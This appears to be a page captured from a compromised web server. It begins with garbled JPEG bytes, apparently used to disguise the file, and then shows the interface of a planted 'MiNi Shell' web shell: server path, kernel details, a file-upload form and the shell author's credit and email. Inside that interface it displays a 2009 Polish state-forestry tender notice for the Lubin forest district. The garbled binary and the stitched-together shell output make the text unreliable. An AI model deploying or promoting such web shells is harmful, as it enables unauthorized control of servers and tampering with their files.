JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/33751-N-2009.html

<p class="kh_header"><b>Lubin: Prace z zakresu gospodarki leśnej w 2009 roku w Nadleśnictwie Lubin - przetarg II</b><br>
<b>Numer ogłoszenia: 33751 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Lubin , ul. Spółdzielcza 18, 59-300 Lubin, woj. dolnośląskie, tel. 076 8412300, 01,01, faks 076 8412301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http.// www.wroclaw.lasy.gov.pl/lubin</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace z zakresu gospodarki leśnej w 2009 roku w Nadleśnictwie Lubin - przetarg II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi leśne z zakresu: pozyskania i zrywki drewna, hodowli lasu, ochrony lasu, ochrony przeciwpożarowej lasu, utrzymania infrastruktury leśnej, zalesiania gruntów porolnych i prac pielęgnacyjnych oraz ochronnych na gruntach porolnych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta częściowa na część zamówienia musi być zabezpieczona wadium o wartości:
Część nr 01 - Leśnictwo Koźlice 	- wadium o wartości:	4 300,00 zł 	 cztery tysiące trzysta PLN
Część nr 02 - Leśnictwo Żelazny Most 	- wadium o wartości:	 4 800,00 zł 	 cztery tysiące osiemset PLN
Część nr 03 - Leśnictwo Szklary	- wadium o wartości:	4 400,00 zł 	 cztery tysiące czterysta PLN
Część nr 04 - Leśnictwo Małomice 	- wadium o wartości:	3 800,00 zł 	 trzy tysiące osiemset PLN
Część nr 05 - Leśnictwo Rudna	- wadium o wartości:	4 400,00 zł 	 cztery tysiące czterysta PLN
Część nr 06 - Leśnictwo Damówka	- wadium o wartości:	3 600,00 zł 	 trzy tysiące sześćset PLN

2.	Wadium może być wniesione w jednej lub kilku następujących formach:
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. Nr 109, poz. 1158, z późn. zm. 
3.	Wadium w formie pieniężnej wpłaca się przelewem na rachunek bankowy zamawiającego nr: BZ WBK oddział Lubin nr: 52 1090 2082 0000 0005 4601 2808 	
w tytule wpłaty należy wpisać: Usługi leśne 2009 przetarg II- część nr:  wymienić wszystkie nr części zamówienia zgodnie z SIWZ, na które składana jest oferta.
4.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy zdeponować w kasie Nadleśnictwa Lubin.
5.	Z treści gwarancji poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego upełnomocnionego przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska. Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 18 lutego 2009 r., do godz. 10.00. 
7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej podanym terminie znajdzie się na rachunku bankowym zamawiającego.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy oraz następujące warunki szczegółowe:
WARUNEK I - Wykonawcy wykażą i udokumentują, iż dysponują lub będą dysponować następującymi maszynami i urządzeniami.
A.	W przypadku składania oferty na części zamówienia od 1 do 06:
1 część zamówienia 	- 1 ciągnik min. 80 KM (lub specjalistyczny ciągnik zrywkowy),          3 pilarki (lub 1 pilarka+specjalistyczna maszyna ścinkowa),           1 pług dwuodkładnicowy do orki gleb leśnych, 

WARUNEK II - Wykonawcy wykażą i udokumentują, iż dysponują lub będą dysponować osobami o następujących kwalifikacjach:
A.	Min. 1 osoba na stanowisku kierowniczym, w przypadku składania oferty na więcej niż trzy części zamówienia, posiadająca świadectwo ukończenia średniej szkoły leśnej lub wyższych studiów leśnych lub dokument (świadectwo) ukończenia kursu organizowanego przez Centrum Kształcenia Przedsiębiorców Leśnych w Leśnym Zakładzie Doświadczalnym w Siemianicach (AR w Poznaniu).
B.	W przypadku składania oferty na części zamówienia od 01 do 06:
-	min. 2 osoby na stanowisku pilarza na każdą część zamówienia, posiadające zaświadczenie ukończenia kursu zawodowego uprawniającego do pracy pilarkami spalinowymi, lub min. 2 osoby na stanowisku operatora harvestera na każdą część zamówienia, posiadające zaświadczenie ukończenia kursu w zakresie obsługi i konserwacji harvestera 
-	 min. 1 osoba na każdą część zamówienia do prac pozostałych. 
WARUNEK III - Wykonawcy wykażą i udokumentują wykonanie w ciągu ostatnich trzech lat usług z zakresu zagospodarowania lasu i lub pozyskania i zrywki drewna o min. wartości całkowitej, w zależności od części przedmiotu zamówienia, na który(e) składana jest oferta:
Część nr 01 - Leśnictwo Koźlice 	     21 815,00 zł   
Część nr 02 - Leśnictwo Żelazny Most 	    24 355,00 zł   
Część nr 03 - Leśnictwo Szklary	     22 036,00 zł   
Część nr 04 - Leśnictwo Małomice 	     19 125,00 zł   
Część nr 05 - Leśnictwo Rudna	     22 243,00 zł    
Część nr 06 - Leśnictwo Damówka	     18 150,00 zł   
WARUNEK IV - Posiadają środki finansowe i lub dysponują zdolność kredytową w wysokości min., w zależności od części zamówienia, na które składana jest oferta:
Część nr 01 - Leśnictwo Koźlice 	8 730,00 zł
Część nr 02 - Leśnictwo Żelazny Most 	9 742,00 zł
Część nr 03 - Leśnictwo Szklary	8 815,00 zł
Część nr 04 - Leśnictwo Małomice 	7 650,00 zł
Część nr 05 - Leśnictwo Rudna	8 897,00 zł
Część nr 06 - Leśnictwo Damówka	7 260,00 zł

2.	Ocena spełniania warunków udziału w postępowaniu:
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach składanych przez Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta musi zawierać następujące dokumenty i oświadczenia:
a)	wypełniony formularz ofertowy wg załączonego wzoru - zał. nr 1,
b)	formularz(e) cenowy(e) oferty wg załączonego wzoru - zał. nr 2,
c)	pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), potwierdzone notarialnie,
d)	aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
e)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy (zawiera formularz ofertowy - zał. nr 1);
f)	aktualną informacje z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), dotycząca:
(a)	osób fizycznych ( współwłaścicieli spółek, właścicieli firm ),
(b)	urzędujących członków władz osób prawnych.
g)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ) - dotyczy podmiotów zbiorowych.
h)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
i)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); 
j)	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich uprawnień i kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - na formularzu wg zał. nr 5 do SIWZ,
k)	pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w zał. nr 5 wykonawca wskazał osoby którymi będzie dysponował 
l)	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
a)	dla pracowników na stanowisku pilarza - zaświadczenie o ukończeniu z wynikiem pozytywnym szkolenia specjalistycznego z zakresu pracy pilarką,
m)	wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje  lub będzie dysponował wykonawca - wg zał. nr 7.
n)	pisemne zobowiązania innych podmiotów do udostępniania niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w zał. nr 7 wykonawca wskazał narzędzia          i urządzenia którymi będzie dysponował 
o)	wykazu wykonanych, w okresie ostatnich 3 lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg załączonego wzoru - zał. nr 6 , 
p)	kopie protokołów odbioru robót, lub rachunków faktur, lub listu polecającego itp. - potwierdzające wykonanie w okresie ostatnich trzech lat kalendarzowych usług z zakresu zagospodarowania lasu lub pozyskania i zrywki drewna, adekwatnie do składanej oferty,
q)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych i lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składnia ofert.
2.	Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez upełnomocnionego przedstawiciela wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http.// www.wroclaw.lasy.gov.pl/lubin.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo: Lubin
ul. Spółdzielcza 18
59-300 Lubin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: Nadleśnictwo Lubin
ul. Spółdzielcza 18
59-300 Lubin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Leśnictwo Koźlice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 01 - Leśnictwo Koźlice 	436 275,28 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Leśnictwo Żelazny Most.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 02 - Leśnictwo Żelazny Most 	487 096,94 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> Leśnictwo Szklary.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 03 - Leśnictwo Szklary	440 727,95 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> Leśnictwo Małomice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 04 - Leśnictwo Małomice 	382 499,66, zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 05 <b>NAZWA:</b> Leśnictwo Rudna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 05 - Leśnictwo Rudna	444 855,53 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 06 <b>NAZWA:</b> Leśnictwo Damówka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 06 - Leśnictwo Damówka	363 000,00 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com